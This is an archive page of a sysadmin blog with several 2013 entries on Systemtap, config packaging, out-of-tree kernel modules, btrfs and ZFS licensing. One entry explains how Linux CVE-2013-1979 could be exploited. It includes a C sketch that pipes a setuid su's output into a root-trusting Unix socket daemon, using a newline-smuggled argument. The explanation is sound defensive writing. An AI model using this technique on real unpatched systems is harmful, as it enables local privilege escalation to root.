Wandering Thoughts archives

2013-05-30

I find Systemtap oddly frustrating

I currently have a ZFS on Linux performance mystery with sequential NFS writes. One of the things that I want to do to diagnose it is to get a trace of NFS client activity so that I can see exactly what is slow and when. In theory I could reconstruct this from sufficient analysis of the TCP stream; in practice I couldn't make Wireshark do this with some brief poking and this seemed like a good time to learn Systemtap (after all, DTrace can definitely do this sort of stuff with effort).

The result has been surprisingly frustrating, especially when I compare it with my DTrace experience. Before DTrace fans start celebrating too much, I think that one reason DTrace was less frustrating for me is that it so obviously threw me to the wolves very rapidly. DTrace had only a massive manual, and within a very short time of poking around with it, it was apparent that it had nothing to help with NFS activity tracing and that I was going to have to read Solaris kernel source.

Systemtap has a lot more attempts at helpful documentation than DTrace does, but so far none of them have led me to a solution to my problem. I still keep reading, because how can I resist a beginner's guide? After all, I am a Systemtap beginner.

This feeds into the additional frustration that is tapsets. Tapsets are the rough equivalent of DTrace providers, except that DTrace providers are limited, hardcoded into the kernel, and documented. Systemtap tapsets can basically be programmed in Systemtap itself, building interesting advanced capabilities on top of basic ones, and you have the source code. The tantalizing source code that may be most of the documentation you have on what an interesting looking tapset might be able to do for you.

(Things provided by standard tapsets are documented here.)

There are other, lesser frustrations. I can boil them all down to Systemtap having a lot of nice features that it doesn't bother to carry all the way through (both in the core Systemtap and especially in tapsets). DTrace is limited in comparison but at least it's pretty honest about its limitations.

(All of this is a very personal reaction to Systemtap, born of the annoyance I'm currently feeling every time I try to spend more time on my NFS monitoring project. I'm sure that there are plenty of people who are very happy with SystemTap.)

SystemtapFrustration written at 00:39:43

2013-05-28

How you should package local-use configuration files

Some packages ship with systems of split configuration files, where there is a standard configuration file (or several) and then a file that is specifically designed to be customized by the local system administrator. The intention is that the sysadmin can make changes to the local-use config file without having to worry about the package's updates to the standard configuration (and thus without having to merge their changes and the package's changes). Unfortunately packages often make a tragic mistake in the contents of these local files.

It's really simple: local-use config files shouldn't have anything that your package will ever change. A local-use config file should have no long helpful comments documenting everything, no sample items, no anything. All it should have is a comment saying roughly 'this is where you make local changes; for a discussion of what can go here, see ...'.

(And the contents of that comment should be designed so that they don't have to change.)

All of the documentation comments and commented-out examples and so on are well intentioned but fatally flawed. It's almost guaranteed that at some point the upstream package will decide to (or need to) rewrite the documentation, add or fix examples, and so on. At that point you've created a change conflict: both your package update and the local sysadmin have changed the same file, and it's up to the local sysadmin to reconcile the result (or to ignore it, which has various consequences). And this is a packaging failure.

Sometimes the upstream package will ship with such a content-heavy local-use configuration file. You should not package this file as-is; instead you should move it to be a documentation file and package a new minimal file as the local-use configuration file.

(One package that commits this error is the privoxy RPM for Fedora. Its /etc/privoxy/user.action file is just full of helpful comments and examples, which of course have sometimes changed between versions.)

PackagingLocalConfigFiles written at 23:44:45

2013-05-24

Understanding how CVE-2013-1979 might be exploited

CVE-2013-1979 is a more or less just-released locally exploitable 'gives root' Linux kernel vulnerability. Usually when I read CVE bug descriptions I can get at least a vague sense of how something would be exploitable, but this one puzzled me; I could see how the bug was not good but I couldn't see how it would be exploitable. Even the proof of concept code didn't particularly clear this up.

As described in the Red Hat bugzilla the core bug is:

Commit 257b5358b32f ("scm: Capture the full credentials of the scm sender") changed the credentials passing code to pass in the effective uid/gid instead of the real uid/gid.

(See also the Debian CVE entry.)

The first thing to understand is this 'credentials passing'. Simplified, it allows a program that's reading input from a Unix socket to discover the UID and GID of the process that sent the input. Programs can use this to easily implement access control (only certain UIDs can send them input) or authorization (certain UIDs are allowed to do special things), or just use the information for better logging and so on. Crucially, the sending program doesn't need to do anything special to enable this; it's entirely handled by the receiving program. The bug is that at one point the kernel code was changed to tell the receiving program the effective UID (and GID) of the sender, not their real UID and GID. This sounds relatively harmless, but it turns out it isn't. Here's how I think you exploit this.
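
To make the 'credentials passing' mechanism concrete, here is a minimal sketch (my illustration, not anything from the CVE material) of the receiving side on Linux, using SO_PASSCRED and SCM_CREDENTIALS; the connected AF_UNIX socket descriptor fd is assumed and error handling is omitted:

    /* A minimal sketch of the receiving side of Unix-socket credentials
     * passing on Linux (SO_PASSCRED + SCM_CREDENTIALS).  'fd' is assumed
     * to be a connected AF_UNIX socket; error handling is omitted. */
    #define _GNU_SOURCE
    #include <sys/socket.h>
    #include <sys/uio.h>
    #include <stdio.h>
    #include <string.h>

    void report_sender(int fd)
    {
        int on = 1;
        /* Ask the kernel to attach the sender's credentials to messages. */
        setsockopt(fd, SOL_SOCKET, SO_PASSCRED, &on, sizeof(on));

        char data[256];
        union {
            char buf[CMSG_SPACE(sizeof(struct ucred))];
            struct cmsghdr align;
        } u;
        struct iovec iov = { .iov_base = data, .iov_len = sizeof(data) };
        struct msghdr msg = {
            .msg_iov = &iov, .msg_iovlen = 1,
            .msg_control = u.buf, .msg_controllen = sizeof(u.buf),
        };

        if (recvmsg(fd, &msg, 0) < 0)
            return;

        /* Walk the control messages to find the kernel-supplied credentials. */
        for (struct cmsghdr *c = CMSG_FIRSTHDR(&msg); c != NULL;
             c = CMSG_NXTHDR(&msg, c)) {
            if (c->cmsg_level == SOL_SOCKET && c->cmsg_type == SCM_CREDENTIALS) {
                struct ucred cr;
                memcpy(&cr, CMSG_DATA(c), sizeof(cr));
                /* On kernels with the CVE-2013-1979 bug, cr.uid and cr.gid
                 * are the sender's *effective* IDs, not its real ones. */
                printf("sender: pid %d uid %d gid %d\n",
                       (int)cr.pid, (int)cr.uid, (int)cr.gid);
            }
        }
    }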

First you need to find a program or a daemon that uses credentials on Unix domain sockets to make access or authorization decisions and that gives root special privileges. It probably also needs to act on simple, single messages; you connect to it, send it a message, and it does stuff for you. The ideal situation is something that accepts newline-delimited ASCII and doesn't drop connections if you send it bad messages. Next you need to find a setuid program that can be tricked into writing a message that you control to standard output or standard error (possibly among other messages). The proof of concept code suggests that su can be coaxed into doing this in some situations, for selected messages.

(Embedding newlines in command line arguments clearly helps here.)

To perform the actual exploit your wrapper program creates a Unix socket connection to the victim program or daemon, makes the socket connection its standard output and/or standard error, then runs su (or whatever) in such a way that it will print out your evil message. Since this message is actually being printed by a setuid program the daemon will see a valid message being sent to it by a privileged (effective) UID 0 process and proceed to carry out whatever evil you've asked it do for you.
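
Here is a hedged sketch of that wrapper; the socket path, the smuggled protocol line, and the su argument are all made-up placeholders, not the actual proof of concept code:

    /* A hedged sketch of the wrapper described above, not working exploit
     * code: the socket path and the su argument are made-up placeholders. */
    #include <sys/socket.h>
    #include <sys/un.h>
    #include <string.h>
    #include <unistd.h>

    int main(void)
    {
        struct sockaddr_un addr = { .sun_family = AF_UNIX };
        /* Hypothetical victim daemon that trusts uid-0 senders. */
        strncpy(addr.sun_path, "/run/victim.sock", sizeof(addr.sun_path) - 1);

        int fd = socket(AF_UNIX, SOCK_STREAM, 0);
        if (fd < 0 || connect(fd, (struct sockaddr *)&addr, sizeof(addr)) < 0)
            return 1;

        /* Everything the setuid program writes now goes to the daemon, and
         * on an affected kernel the daemon sees it as coming from euid 0. */
        dup2(fd, STDOUT_FILENO);
        dup2(fd, STDERR_FILENO);

        /* su's error output will echo our argument; the embedded newline
         * smuggles a complete line of the daemon's protocol into it. */
        execlp("su", "su", "no-such-user\nEVIL REQUEST TO THE DAEMON", (char *)0);
        return 1;
    }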

Whether this is exploitable on any particular Linux system depends a lot on what you have running. Building a real exploit would probably take a fair amount of work because I think that most common daemons that talk over Unix domain sockets (such as the DBus daemon) use encoded wire protocols, not simple ASCII messages.

(Possibly I'm wrong here and there's a candidate daemon I'm missing. In any case there's a fix out now so you should be updating pretty fast.)

UnderstandingCredentialsCVE written at 16:00:46

2013-05-19

The technical effects of being an out of tree Linux kernel module

Suppose that you have a kernel module that is not in the mainstream kernel source for one reason or another. Perhaps it is license compatible but just not integrated for various reasons (as is the case with IET) or perhaps it is license incompatible (as is the case with ZFS on Linux). This non-inclusion has a number of cultural effects, but it also has real technical effects. Although I've mentioned them before, today I want to talk about them in some detail.

The first thing to know is that the Linux kernel does not have a stable kernel API for modules; how a module interacts with the rest of the kernel can and will change without notice. When your module is part of the kernel source, changing it to cope with the API change is generally the responsibility of the kernel developer who wants to make the API change. When your module is not in the kernel tree, not only is changing its code your job but so is even knowing about the API change. And API changes are not always obvious because sometimes they're things like changes in locking requirements or how you are supposed to use existing functions.

(Sometimes they are semi-obvious, like changing just what arguments a function takes. You do pay attention to all warning messages that show up when building your kernel module, right?)
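
As an illustration of what coping with this looks like, out-of-tree modules usually end up sniffing the kernel version (or probing for it at build time) around every affected call site. Here is a minimal sketch, using the well-known removal of the old BKL-based .ioctl file operation in 2.6.36; the module name and handlers are hypothetical:

    /* Illustrative sketch only: how an out-of-tree module typically papers
     * over a kernel API change it has to track by itself.  The change used
     * here is the removal of the old BKL-based .ioctl file operation in
     * 2.6.36; 'mymod' and its handlers are hypothetical. */
    #include <linux/version.h>
    #include <linux/fs.h>

    static long mymod_unlocked_ioctl(struct file *filp, unsigned int cmd,
                                     unsigned long arg)
    {
        /* ... the module's real ioctl handling would go here ... */
        return 0;
    }

    #if LINUX_VERSION_CODE < KERNEL_VERSION(2, 6, 36)
    /* Older kernels still call the inode-taking, BKL-holding variant, so
     * wrap the new-style handler for them. */
    static int mymod_ioctl(struct inode *inode, struct file *filp,
                           unsigned int cmd, unsigned long arg)
    {
        return (int)mymod_unlocked_ioctl(filp, cmd, arg);
    }
    #endif

    static const struct file_operations mymod_fops = {
    #if LINUX_VERSION_CODE < KERNEL_VERSION(2, 6, 36)
        .ioctl          = mymod_ioctl,
    #else
        .unlocked_ioctl = mymod_unlocked_ioctl,
    #endif
    };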

Any number of people would like this to change but it isn't going to. The Linux kernel development process is optimized for in-tree code and not for out of tree code. If your out of tree code cannot be included in the kernel for various reasons, that's tough luck but the kernel developers really don't care that much (as a general rule). Locking themselves down to any stable module API would reduce their ability to improve and evolve the kernel code.

The next effect is pragmatic: if your code is not in the kernel tree, almost no one will look at it (and this includes automated scans over the kernel source code that look for various things) or do things to it. This is great if you're possessive about your code but it means that you're missing out on the quality checking that this creates, all of the little janitorial cleanups that people do, and if there is a bug then your module's developers are the only people who are looking at it.

(In some quarters it's fashionable to think that the Linux kernel developers are all clowns and cannot possibly contribute anything worthwhile to your code. This is a major mistake. Among other things they're basically certain to know the overall Linux kernel environment better than you do.)

A related issue is that the kernel developers try not to create bugs and regressions in in-tree code, especially if it's considered important (which, say, a commonly used filesystem will be); if one is created anyways a bunch of people will go looking to try to fix it. It's almost certain that no official kernel release would go out that broke a significant filesystem; the change that created the breakage would be identified and then reverted, with the change's developer told to try again. If your module is not in the tree, well, you're on your own. Performance regressions or actual breakages are your problem to diagnose and then either fix or try to argue the kernel developers into changing their side of the problem.

(And they may not, especially if your code is license-incompatible with the kernel and most especially if their change actually improves in-tree code and performance and so on.)

All of this means an out of tree kernel module requires more ongoing development work than an in-tree kernel module. In-tree kernel modules generally get somewhat of a ride from general kernel developers; out of tree modules do not and have to make up for it with time from their own developers. One predictable result is that many out of tree modules don't necessarily support all kernel versions, including kernel versions that sysadmins may want to use. A worst case situation with out of tree modules is that the developers simply stop updating the module for new kernels; any users of the module are then orphaned on old kernels.

TechnicalNonGPLKernelModules written at 01:19:52

2013-05-17

Why I'm not considering btrfs for our future fileservers just yet

In a comment on yesterday's entry I was asked:

Could you elaborate on the "btrfs does not qualify" part?

What's missing? How likely do you think this to change in the near future?

I will give a simple looking answer that conceals big depths: what's missing is a btrfs webpage that doesn't say 'run the latest kernel.org kernel' and a Fedora release that doesn't say 'btrfs is still experimental and is included as a technology preview' (which is what Fedora 18 says). It's possible that btrfs is more mature and ready than I think it is, but if so the btrfs people are doing a terrible job of publicizing this. Fundamentally I want to be using something that the developers consider 'mature' or at least 'ready' and I don't want us to be among the first pioneers with a production deployment of decent size in a challenging environment.

Pragmatically there is nothing that btrfs can do to make us consider it in the near future, for reasons I wrote about two years ago in an entry on the timing of production btrfs deployments. If btrfs magically became perfect tomorrow, it would only appear in an Ubuntu LTS release in 2014 and in a Red Hat Enterprise release in, well, who knows, but probably not this year.

(The current Ubuntu 12.04 LTS has btrfs v3.2, whereas btrfs is up to v3.9 already. The btrfs changelog shows the scope of a year's evolution.)

As for what specifically is missing, well, I have to confess that I haven't looked at the current state of btrfs in much detail and so I don't have specific answers. I poke at btrfs vaguely every so often; generally I discover something that strikes me as alarming and then I go away again. Since btrfs is never going to be exactly like ZFS, I can't just directly translate our ZFS fileserver design to btrfs and then complain about what's missing or different. To have a really informed opinion on what btrfs needs and what's wrong with it, I'd have to do a btrfs-based fileserver design from scratch, trying to harmonize what we think we want (which has been shaped by what ZFS gives us) with what btrfs gives us. So far there seems to be no real point in doing that before btrfs stabilizes.

(I'm starting to think that btrfs and ZFS have fundamentally different visions about some things, but that needs some more reading and another entry.)

Sidebar: ZFS on Linux maturity versus btrfs maturity

You might ask why I'm willing to consider ZFS on Linux even though it's a relatively young project, just like btrfs. The answer is that the two are fundamentally different. The ZFS part of ZoL is generally a mature and well-proven codebase; most of the uncertain new bits are just for fitting it into Linux.

BtrfsWhyNotYet written at 01:29:56

2013-05-16

Why ZFS's CDDL license matters for ZFS on Linux

In a G+ conversation about ZFS I read the following:

[...] so, why use BTRFS at all? :-) Just the fact that it's GPL (and so able to be embedded into the kernel source tree) doesn't seem enough, specially considering that CDDL (the ZFS license) is a bona fide open source license, [...]

On the whole I like ZFS on Linux, but let's not mince words here: this licensing issue is a big issue. Were btrfs and ZFS close to general parity, it would be a very strong push towards btrfs.

That ZFS is CDDL licensed means that it can never be included in the Linux kernel source. It may mean that it can't be prepackaged in binary form by distributions, or at least by distributions that care strongly about licensing issues. The CDDL is part of what makes it extremely unlikely that Red Hat Enterprise or Ubuntu LTS will ever officially support ZoL, making it always be a 'batteries not included, you get to integrate it' portion of the system.

That ZFS will not be included in the Linux kernel source (because of the CDDL among other reasons) means that you are more at risk of developers ceasing to update ZFS for newer kernels (among other less important effects).

(Being in the Linux kernel source is no guarantee that code will be maintained, but it increases the chances a fair bit.)

These are risks that we'd be willing and able to take on, so they aren't real obstacles for us using ZoL if that turns out to be the best option for new fileservers. But they still weigh on my mind and there are any number of places where they are going to be real issues, sometimes killer ones.

(I've written about this before.)

(Given the current situation with 4k disks, we're already looking at recreating pools when we move them to a new fileserver infrastructure. At that point we could just as easily migrate from ZFS to something else, if the something else was good enough. Btrfs currently does not qualify.)

ZFSWhyCDDLMatters written at 01:16:45
